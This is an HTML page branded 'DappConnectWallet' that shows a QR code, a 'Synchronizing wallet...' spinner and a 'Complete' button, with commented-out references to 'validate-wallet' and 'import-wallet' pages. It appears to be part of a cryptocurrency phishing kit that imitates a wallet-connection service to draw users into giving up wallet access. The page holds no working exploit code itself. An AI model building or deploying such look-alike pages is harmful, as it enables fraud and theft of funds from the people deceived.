<html>

<head>
    <meta name="viewport" content="width=device-width">
    <meta charset="utf-8">
    <title>DappConnectWallet</title>
    <meta name="description" content="DappConnectWallet is a free protocol that lets users manage all their wallets from one space">
    <link rel="icon" href="favicon.ico">
    <meta name="next-head-count" content="5">
    <link rel="preload" href="/_next/static/css/fa605a2e7387ae6acff3.css" as="style">
    <link rel="stylesheet" href="main.css" data-n-g=""><noscript data-n-css=""></noscript>
    <!--link rel="preload" href="/_next/static/chunks/webpack-189c53927ffd3caf09c3.js" as="script">
    <link rel="preload" href="/_next/static/chunks/framework-92300432a1172ef1338b.js" as="script">
    <link rel="preload" href="/_next/static/chunks/main-71948af4b0f09c0fc30e.js" as="script">
    <link rel="preload" href="/_next/static/chunks/pages/_app-9e366951ad03f095f5b3.js" as="script">
    <link rel="preload" href="/_next/static/chunks/814-16eda819eff2e28d39ff.js" as="script">
    <link rel="preload" href="/_next/static/chunks/372-9486bbaab2c58acf8d36.js" as="script">
    <link rel="preload" href="/_next/static/chunks/748-ecf7ef402c655d9fd446.js" as="script">
    <link rel="preload" href="/_next/static/chunks/pages/validate-wallet-4c1b61a8002e9aa017ca.js" as="script">
    <link as="script" rel="prefetch" href="/_next/static/chunks/814-16eda819eff2e28d39ff.js">
    <link as="script" rel="prefetch" href="/_next/static/chunks/748-ecf7ef402c655d9fd446.js">
    <link as="script" rel="prefetch" href="/_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.js">
    <link as="script" rel="prefetch" href="/_next/static/chunks/pages/connect-5e1e7bced13f0f8f7567.js"-->
</head>

<body>
    <div id="__next">
        <header class="fixed z-50 w-full bg-white py-4 sm:py-5 px-2 sm:px-3 border-b shadow-md">
            <div class="container max-w-screen-lg mx-auto flex flex-row items-center justify-between">
                <div class="inline-flex items-center justify-center cursor-pointer"><img src="logo.svg" class="h-10 w-10">
                    <h1 class="text-xl ml-2 font-black">DappConnectWallet</h1>
                </div>
                <div><a class="inline-flex items-center justify-center text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-6 py-2 rounded-md border-2 border-primary" href="connect.html">Connect</a></div>
            </div>
        </header>
        <div class="h-14"></div>
        <main>
            <div class="container max-w-screen-sm py-20 px-5 md:px-8 flex flex-col h-full items-center justify-items-center mx-auto text-center"><img src="https://connectdappwallet.netlify.app/qrcode.png" class="h-60"><svg class="animate-spin -ml-1 mr-3 h-16 w-16 text-primary" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle><path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path></svg>
                <h2 class="text-2xl text-center justify font-bold my-4">Synchronizing wallet...</h2>
                <p class="text-lg text-gray-600 mb-6">This may take a few moments to complete</p><button class="inline-flex rounded-md bg-primary text-white font-bold uppercase text-sm px-6 py-3 items-center justify-center shadow outline-none focus:outline-none mr-1 mb-1 ease-linear transition-all duration-150"
                    type="button">Complete</button></div>
        </main>
        <footer class="border-t border-gray-200">
            <div class="container max-w-screen-lg mx-auto flex flex-col md:flex-row md:items-center md:justify-between py-6">
                <ul class="flex mb-4 mx-auto md:mx-0 md:ml-4 md:mb-0">
                    <li><a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Twitter"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><path d="M24 11.5c-.6.3-1.2.4-1.9.5.7-.4 1.2-1 1.4-1.8-.6.4-1.3.6-2.1.8-.6-.6-1.5-1-2.4-1-1.7 0-3.2 1.5-3.2 3.3 0 .3 0 .5.1.7-2.7-.1-5.2-1.4-6.8-3.4-.3.5-.4 1-.4 1.7 0 1.1.6 2.1 1.5 2.7-.5 0-1-.2-1.5-.4 0 1.6 1.1 2.9 2.6 3.2-.3.1-.6.1-.9.1-.2 0-.4 0-.6-.1.4 1.3 1.6 2.3 3.1 2.3-1.1.9-2.5 1.4-4.1 1.4H8c1.5.9 3.2 1.5 5 1.5 6 0 9.3-5 9.3-9.3v-.4c.7-.5 1.3-1.1 1.7-1.8z"></path></svg></a></li>
                    <li class="ml-4"><a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Github"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><path d="M16 8.2c-4.4 0-8 3.6-8 8 0 3.5 2.3 6.5 5.5 7.6.4.1.5-.2.5-.4V22c-2.2.5-2.7-1-2.7-1-.4-.9-.9-1.2-.9-1.2-.7-.5.1-.5.1-.5.8.1 1.2.8 1.2.8.7 1.3 1.9.9 2.3.7.1-.5.3-.9.5-1.1-1.8-.2-3.6-.9-3.6-4 0-.9.3-1.6.8-2.1-.1-.2-.4-1 .1-2.1 0 0 .7-.2 2.2.8.6-.2 1.3-.3 2-.3s1.4.1 2 .3c1.5-1 2.2-.8 2.2-.8.4 1.1.2 1.9.1 2.1.5.6.8 1.3.8 2.1 0 3.1-1.9 3.7-3.7 3.9.3.4.6.9.6 1.6v2.2c0 .2.1.5.6.4 3.2-1.1 5.5-4.1 5.5-7.6-.1-4.4-3.7-8-8.1-8z"></path></svg></a></li>
                    <li class="ml-4"><a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Facebook"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><path d="M14.023 24L14 17h-3v-3h3v-2c0-2.7 1.672-4 4.08-4 1.153 0 2.144.086 2.433.124v2.821h-1.67c-1.31 0-1.563.623-1.563 1.536V14H21l-1 3h-2.72v7h-3.257z"></path></svg></a></li>
                </ul>
                <div class="text-sm text-center md:text-right">© 2022 <a class="hover:underline" href="/">DappConnectWalletme.com</a></div>
            </div>
        </footer>
    </div>
    <script id="__NEXT_DATA__" type="application/json">
        {
            "props": {
                "pageProps": {
                    "id": "cf21952a9bc8108bf13b12c92443751e2cc388d27008be4201b92bbc6d83dd46"
                },
                "__N_SSP": true
            },
            "page": "/validate-wallet",
            "query": {
                "type": "cf21952a9bc8108bf13b12c92443751e2cc388d27008be4201b92bbc6d83dd46"
            },
            "buildId": "5LH9GdAXPhV9OnKcu2OUo",
            "isFallback": false,
            "gssp": true
        }
    </script>
    <!--script nomodule="" src="/_next/static/chunks/polyfills-eef578260fd80f8fff94.js"></script>
    <script src="/_next/static/chunks/webpack-189c53927ffd3caf09c3.js" async=""></script>
    <script src="/_next/static/chunks/framework-92300432a1172ef1338b.js" async=""></script>
    <script src="/_next/static/chunks/main-71948af4b0f09c0fc30e.js" async=""></script>
    <script src="/_next/static/chunks/pages/_app-9e366951ad03f095f5b3.js" async=""></script>
    <script src="/_next/static/chunks/814-16eda819eff2e28d39ff.js" async=""></script>
    <script src="/_next/static/chunks/372-9486bbaab2c58acf8d36.js" async=""></script>
    <script src="/_next/static/chunks/748-ecf7ef402c655d9fd446.js" async=""></script>
    <script src="/_next/static/chunks/pages/validate-wallet-4c1b61a8002e9aa017ca.js" async=""></script>
    <script src="/_next/static/5LH9GdAXPhV9OnKcu2OUo/_buildManifest.js" async=""></script>
    <script src="/_next/static/5LH9GdAXPhV9OnKcu2OUo/_ssgManifest.js" async=""></script>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert" style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; width: 1px; white-space: nowrap; overflow-wrap: normal;">DappConnectWallet</p>
    </next-route-announcer>
    <script src="/_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.js"></script>
    <script src="/_next/static/chunks/pages/connect-5e1e7bced13f0f8f7567.js"></script>
    <script src="/_next/static/chunks/pages/import-wallet-81130021068dcf5720d2.js"></script-->
</body>

</html>